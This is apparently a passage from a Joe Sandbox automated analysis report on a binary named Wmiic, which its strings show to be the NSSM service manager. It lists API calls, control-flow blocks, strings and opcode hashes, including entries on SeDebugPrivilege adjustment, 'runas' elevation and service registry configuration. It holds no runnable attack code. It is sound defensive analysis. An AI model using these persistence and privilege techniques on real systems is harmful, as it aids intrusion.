  • Part of subcall function 00000001400025F0: ReportEventW.ADVAPI32 ref: 0000000140002688
  • Part of subcall function 00000001400025F0: DeregisterEventSource.ADVAPI32 ref: 0000000140002691
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Event$HeapSource$AllocDeregisterProcessRegisterReport
• String ID: alloc_nssm_service()$service
• API String ID: 1868725766-2157636798
• Opcode ID: 340dcb3ea64f2eaa611f07df5ba2ae7dbefa44cddf1a4083a5f2c707a3498489
• Instruction ID: 68c9e48bc270ec39d5ec3dc1802da48655ef9d9f8276d5f31e599d5297850325
• Opcode Fuzzy Hash: 340dcb3ea64f2eaa611f07df5ba2ae7dbefa44cddf1a4083a5f2c707a3498489
• Instruction Fuzzy Hash: 5EE0D834611B9982FF029F62A4143DA6390A74D784F480029EE894B375EF3CC9498B00

Control-flow Graph (basic blocks and edges)
• Block 1007 (140001d10-140001d1d): GetConsoleWindow -> 1008, 1009
• Block 1008 (140001d4a-140001d50): exit
• Block 1009 (140001d1f-140001d2f): GetWindowThreadProcessId -> 1008, 1010
• Block 1010 (140001d31-140001d3b): GetCurrentProcessId -> 1011, 1012
• Block 1011 (140001d44): FreeConsole -> 1008
• Block 1012 (140001d3d-140001d43)
APIs
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: ConsoleProcessWindow$CurrentFreeThread

Control-flow Graph (basic blocks and edges)
• Block 1013 (14000b770-14000b796) -> 1014, 1015
• Block 1014 (14000b798-14000b7c6): RegCreateKeyExW -> 1016, 1017
• Block 1015 (14000b7cd-14000b7ec): RegOpenKeyExW -> 1016, 1018
• Block 1016 (14000b827-14000b843): exit
• Block 1017 (14000b7c8-14000b7cb) -> 1019
• Block 1018 (14000b7ee-14000b7f6) -> 1019, 1020
• Block 1019 (14000b7fd-14000b822): GetLastError, call 140002430, call 1400025f0 -> 1016
• Block 1020 (14000b7f8-14000b7fb) -> 1016, 1019
APIs
Similarity
• API ID: CreateErrorLastOpen
APIs
• OpenSCManagerW.ADVAPI32(?,?,?,?,00000001400133C9), ref: 000000014000EE20
  • Part of subcall function 00000001400025F0: RegisterEventSourceW.ADVAPI32 ref: 0000000140002613
  • Part of subcall function 00000001400025F0: ReportEventW.ADVAPI32 ref: 0000000140002688
  • Part of subcall function 00000001400025F0: DeregisterEventSource.ADVAPI32 ref: 0000000140002691
Strings
Similarity
• API ID: Event$Source$DeregisterManagerOpenRegisterReport
• String ID: ServicesActive
APIs
Similarity
• API ID: _errno$DecodePointer
APIs
• GetEnvironmentStringsW.KERNEL32(?,?,00000001,0000000140019F3F), ref: 000000014002056C
• FreeEnvironmentStringsW.KERNEL32(?,?,00000001,0000000140019F3F), ref: 00000001400205C3
Similarity
• API ID: EnvironmentStrings$Free
APIs
Similarity
• API ID: ErrorLastValue
APIs
  • Part of subcall function 0000000140002530: GetUserDefaultLCID.KERNELBASE(?,?,?,?,?,?,00000000,00000001400026CE,?,?,?,00000000,0000000140001065), ref: 0000000140002538
  • Part of subcall function 0000000140002530: FormatMessageW.KERNELBASE ref: 0000000140002567
  • Part of subcall function 0000000140002530: FormatMessageW.KERNEL32 ref: 0000000140002599
  • Part of subcall function 0000000140002530: GetProcessHeap.KERNEL32 ref: 00000001400025A3
  • Part of subcall function 0000000140002530: HeapAlloc.KERNEL32 ref: 00000001400025B2
  • Part of subcall function 0000000140002530: _snwprintf_s.LIBCMT ref: 00000001400025D4
• _vfwprintf_p.LIBCMT ref: 00000001400026E1
• LocalFree.KERNEL32(?,?,?,00000000,0000000140001065), ref: 00000001400026E9
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Similarity
• API ID: FormatHeapMessage$AllocDefaultFreeLocalProcessUser_snwprintf_s_vfwprintf_p
• String ID:
• API String ID: 418798648-0
Similarity
• API ID: Heap$CreateInformation
• String ID:
• API String ID: 1774340351-0
APIs
• malloc.LIBCMT ref: 000000014001A2FF
  • Part of subcall function 00000001400206EC: _FF_MSGBANNER.LIBCMT ref: 000000014002071C
  • Part of subcall function 00000001400206EC: HeapAlloc.KERNEL32(?,?,00000000,000000014001A304,?,?,00000000,000000014001A895,?,?,00000000,000000014001A93F), ref: 0000000140020741
  • Part of subcall function 00000001400206EC: _errno.LIBCMT ref: 0000000140020765
  • Part of subcall function 00000001400206EC: _errno.LIBCMT ref: 0000000140020770
• Sleep.KERNEL32(?,?,00000000,000000014001A895,?,?,00000000,000000014001A93F,?,?,?,?,?,?,00000000,000000014001C67C), ref: 000000014001A316
Similarity
• API ID: _errno$AllocHeapSleepmalloc
• String ID:
• API String ID: 496785850-0
Similarity
• API ID: _flush
• String ID:
• API String ID: 1054455859-0
Similarity
• API ID: EnvironmentVariable$_snwprintf_s$Event$HeapProcessSourceTime$AllocCriticalCurrentDeregisterEnterFileRegisterReportSectionSystem
• String ID: "%s" %s$%lu$%s (%s/%s)$2.24-101-g897c7ad$2017-04-26$64-bit$NSSM_ACTION$NSSM_APPLICATION_PID$NSSM_APPLICATION_RUNTIME$NSSM_BUILD_DATE$NSSM_COMMAND_LINE$NSSM_CONFIGURATION$NSSM_DEADLINE$NSSM_EVENT$NSSM_EXE$NSSM_EXITCODE$NSSM_EXIT_COUNT$NSSM_HOOK_VERSION$NSSM_LAST_CONTROL$NSSM_PID$NSSM_RUNTIME$NSSM_SERVICE_DISPLAYNAME$NSSM_SERVICE_NAME$NSSM_START_COUNT$NSSM_START_REQUESTED_COUNT$NSSM_THROTTLE_COUNT$NSSM_TRIGGER$NSSM_VERSION$Pre$Start$h$hook$nssm_hook$nssm_hook()
• API String ID: 1580475628-2341226502
APIs
• RegCloseKey.ADVAPI32(00000003,00000000,?,00000003,00000000,0000000140010A23), ref: 000000014000DE27
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Close
                                                                                                                                                                                                    • String ID: AppAffinity$AppDirectory$AppEnvironment$AppEnvironmentExtra$AppKillProcessTree$AppNoConsole$AppParameters$AppPriority$AppRedirectHook$AppRestartDelay$AppRotateBytes$AppRotateBytesHigh$AppRotateDelay$AppRotateFiles$AppRotateOnline$AppRotateSeconds$AppStopMethodConsole$AppStopMethodSkip$AppStopMethodThreads$AppStopMethodWindow$AppThrottle$AppTimestampLog$Application$NSSM
                                                                                                                                                                                                    • API String ID: 3535843008-3506916582
APIs
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Heap$Free$Process$ErrorLastOpenService$ChangeCloseConfigHandleLocalManager_vfwprintf_p
• String ID: %s: %s$%s: %s$%s\%s: %s$List$SYSTEM\CurrentControlSet\Control\ServiceGroupOrder$groups$set_service_dependencies()
• API String ID: 717911963-3133791794
APIs
  • Part of subcall function 0000000140009FB0: GetConsoleWindow.KERNEL32 ref: 0000000140009FB8
  • Part of subcall function 0000000140009FB0: GetStdHandle.KERNEL32 ref: 0000000140009FC8
  • Part of subcall function 0000000140009FB0: GetProcessWindowStation.USER32 ref: 0000000140009FD3
  • Part of subcall function 0000000140002430: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,000000014000104C), ref: 0000000140002442
  • Part of subcall function 0000000140002430: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,000000014000104C), ref: 0000000140002458
• CloseServiceHandle.ADVAPI32 ref: 000000014001296C
  • Part of subcall function 0000000140002430: TlsSetValue.KERNEL32(?,?,?,?,?,?,?,000000014000104C), ref: 0000000140002481
  • Part of subcall function 0000000140002430: GetUserDefaultLangID.KERNEL32(?,?,?,?,?,?,?,000000014000104C), ref: 0000000140002487
  • Part of subcall function 0000000140002430: FormatMessageW.KERNEL32 ref: 00000001400024B1
  • Part of subcall function 0000000140002430: FormatMessageW.KERNEL32 ref: 00000001400024DE
  • Part of subcall function 0000000140002430: _snwprintf_s.LIBCMT ref: 00000001400024FF
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: FormatHandleMessageValueWindow_errno$AllocCloseConsoleDefaultLangLocalProcessServiceStationUser_snwprintf_s
• String ID: %s$%s: %s$%s: %s: %s$AppThrottle
• API String ID: 3091485450-1444196156
APIs
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Service$ErrorEventLast$AllocCreateCriticalHeapInitializeProcessRegisterSectionSource$CloseCtrlCurrentDeregisterDisplayHandleHandlerLocalNameReportSleepStatusThreadTimerValueWaitable_snwprintf_s
• String ID: NSSM$debug$service->name$service_main()
• API String ID: 867767197-3121758583
APIs
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Heap$FreeProcess$AllocCommandExecuteLineLocalShell_snwprintf_s_vfwprintf_p
• String ID: "$GetCommandLine()$elevate()$p$runas
• API String ID: 568333785-2664397508
APIs
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: ThreadToken$AdjustCurrentOpenPrivileges$CloseErrorHandleImpersonateLastLookupPrivilegeSelfValue
• String ID: SeDebugPrivilege
• API String ID: 2095247420-2896544425
APIs
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$ErrorLastSource$AllocCloseCreateDeregisterHandleLocalRegisterReportSnapshotToolhelp32Value
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3638057332-0
                                                                                                                                                                                                    • Opcode ID: 736b111b100a646399828fc1beca10fc05defdbe9cab0c2b345cb83a7c5a2b91
                                                                                                                                                                                                    • Instruction ID: d4a25d63226701a5820217a3ec4a756d52cdc905e9f9b02ee8c88e4c8cc5a9cb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 736b111b100a646399828fc1beca10fc05defdbe9cab0c2b345cb83a7c5a2b91
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F417E7261468086E781DB36F54079A77A1E78DBD4F400229FB9A97BA9EF3CC841CB40
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3778485334-0
                                                                                                                                                                                                    • Opcode ID: 2c73cabdacd67ecc1ab47cb5ea7a511d34c178d29615d86a7b68e056a520e744
                                                                                                                                                                                                    • Instruction ID: 68ad1d73d9e93cc6001284d5fa1a39834dd5386839cfa0cf077785c591060cfe
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c73cabdacd67ecc1ab47cb5ea7a511d34c178d29615d86a7b68e056a520e744
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B231F231105F808AEB629B62F8543DA73A1F78C3D4F60452AEB8E43B75DF38C4948B00
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$ByteCharErrorLastMultiWide
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3895584640-0
                                                                                                                                                                                                    • Opcode ID: de36e9be98680906f13d6fdec89071b2ed5335f68037e9720c0431ee17c4b1d6
                                                                                                                                                                                                    • Instruction ID: c1f587e2613b7e2320280e204ff58a8efa348b9f757dde8eac3d56b3eb560925
                                                                                                                                                                                                    • Opcode Fuzzy Hash: de36e9be98680906f13d6fdec89071b2ed5335f68037e9720c0431ee17c4b1d6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D35186726047C04AF7729F66E0503EEB790E3897D0F588119F79947AE5DE78CC818B16
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$DecodePointer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2310398763-0
                                                                                                                                                                                                    • Opcode ID: e0cda3e0a9685855bd5d47f415d7519a3ac5b8f32a93c0f4dcec5490e416f5e2
                                                                                                                                                                                                    • Instruction ID: 44ef4eb01c81118c6643f99bc6a2e946d05f9bc6aed31f978ef6c775e81dc10f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0cda3e0a9685855bd5d47f415d7519a3ac5b8f32a93c0f4dcec5490e416f5e2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1631E332B1065442F3279B3BA5827EE6552A78C794F588219FB250FBFACF3AC441C700
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3429775523-0
                                                                                                                                                                                                    • Opcode ID: 3be228cc09c29312831331bff11f0d4ef4207261988248bd0618be56e79fc0d1
                                                                                                                                                                                                    • Instruction ID: 48eee273634d74207520e7cdaf30b75688e279164638d9c4aace6fd17198c53c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3be228cc09c29312831331bff11f0d4ef4207261988248bd0618be56e79fc0d1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1211F872618B808AE752CB26F45434BBBE0F399784F54005AE7C987B69DB3DD109CF40
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1012874770-0
                                                                                                                                                                                                    • Opcode ID: 0b0a0ae3fdfc1ed0fa13838e4ad93de12d14e6b930d1803b0b0efe21a5381680
                                                                                                                                                                                                    • Instruction ID: 8d2492f42c3375f3df4473a04d93de8bff90f0277a39e01c48f8c640fe808fed
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b0a0ae3fdfc1ed0fa13838e4ad93de12d14e6b930d1803b0b0efe21a5381680
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59417432A1158883FA57BB77C8563EC1320ABCAB84F444231BB5D6F6B7CEB5C8459360
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Time$System$Handle$CloseErrorLast$CompareCopyCreateInformationMovePointerSleep
                                                                                                                                                                                                    • String ID: CopyFile()$CreateFile()$MoveFile()
                                                                                                                                                                                                    • API String ID: 3228394015-381917562
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID:
• String ID: dependencies$native_set_dependongroup
• API String ID: 0-409972118
APIs
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Process$AffinityCurrentMask
• String ID: All
• API String ID: 1231390398-55916349
APIs
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Heap$Event$ProcessSource$AllocDeregisterFreeQueryRegisterReportValue
• String ID: get_string()
• API String ID: 4130051898-896229945
APIs
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID: AppEnvironment
• API String ID: 3859560861-948859433
APIs
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Heap_snwprintf_s$Process$AllocFreeObjectServiceSingleStatusWait
• String ID: %lu$%s()
• API String ID: 3601813699-699940799
APIs
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Heap$AllocConfig2ErrorLastProcessQueryService
• String ID: SERVICE_CONFIG_DESCRIPTION$get_service_description()
• API String ID: 2527037045-119971955
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$ConsoleHandleProcessStation
                                                                                                                                                                                                    • String ID: %s: %lu: %s$%s: %s
                                                                                                                                                                                                    • API String ID: 2390998093-150483647
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
